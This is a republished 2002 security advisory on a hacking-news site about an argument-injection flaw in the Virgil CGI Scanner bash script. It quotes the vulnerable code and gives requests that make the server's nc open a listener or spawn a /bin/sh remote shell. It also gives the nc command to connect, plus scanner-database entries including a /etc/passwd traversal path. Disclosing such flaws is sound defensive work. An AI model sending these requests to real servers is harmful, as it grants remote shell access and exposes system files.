Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Virgil CGI Scanner Vulnerability

Virgil CGI Scanner Vulnerability

by Nikola Strahija on October 23rd, 2002 Software : Virgil CGI Scanner 0.9 Programmer : Marc Ruef Vulnerability : Privilege Escalation Status : Author has been notified Type : remote


- - Issue

Joschka Fischer discovered a security hole in the CGI vulnerability scanner
'Virgil' by Mark Ruef [1] ! By sending a special crafted request one is able
to spawn a remote shell with the privileges of the running CGI script.

Depending on the used software this is either the owner of the script (suExec)
or the user under which the HTTP daemon is executed (usually nobody).

- - Problem Description

Virgil CGI Scanner by Mark Ruef is a simple Bash Script which offers an
interface to start CGI security audits against foreign hosts. The author states
that his software represents the first free online-based CGI scanner and uses a
very effective and fast technique to determine vulnerabilities.

Mark Ruef - a self-proclaimed security expert - recently received fame by posting
different announcements to well-known security mailinglists and by writing a
german book called "Hacking Intern" which deals with common security techniques and
has been released by a german gossip publisher house [2].

To get the Virgil CGI Scanner look at:
http://www.computec.ch/software/webserver/virgil_cgi_scanner/virgil-0.9.tar.gz
MD5SUM: fe098b68c0de04cb0200f2db324ab10b

For a running version visit:
http://scanner.computec.ch/cgi-bin/virgil/virgil.cgi

- - Technical Description

The following vulnerability is present in Virgil CGI Scanner v. 0.9!

BANNER=`echo -e "HEAD / HTTP/1.0nn" |nc -w 10 $TARGET $ZIELPORT`

Here, both variables are user-supplied:

TARGET=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $1}' |sed s/"tar="//`
ZIELPORT=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $2}' |sed s/"zielport="// |sed "s/-//g"`

Nevertheless there exist a few restrictions, namly:
- The $QUERY_STRING was not parsed, i.e. %20 for example was not replaced with ' '
- In $ZIELPORT the dash ('-') is filtered out

To test whether the script is vulnerable use the following request and telnet to
the given port number (i.e. 31337):

/cgi-bin/virgil.cgi?tar=-lp&zielport=31337

Exploitation is very straight forwared as long as nc supports the -e command:

'/cgi-bin/virgil.cgi?tar=-le/bin/sh' spawns a remote shell on a port for
exactly 10 seconds ("-w 10")! To connect to this shell execute `nc -v TARGET.COM 1030-6000`
while constantly requesting the URI mentioned above.

- - Workaround / Patch

We are currently not aware of any patches, but we suggest you to update your Virgil
Vulnerable CGI-Script Database accordingly.

*** apache.db.old Sun Oct 23 23:05:05 1983
--- apache.db Sun Oct 23 23:05:05 1985
***************
*** 1,3 ****
--- 1,5 ----
+ cgi-bin/virgil.cgi?tar=-lp&zielport=31337
+ cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd

- - References / Greets

[1] http://www.computec.ch
[2] http://www.amazon.de/exec/obidos/ASIN/381582284X

Pengo for elite VMS security
Nung at the CCC-Congress, next time i will ask for coffee.



Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »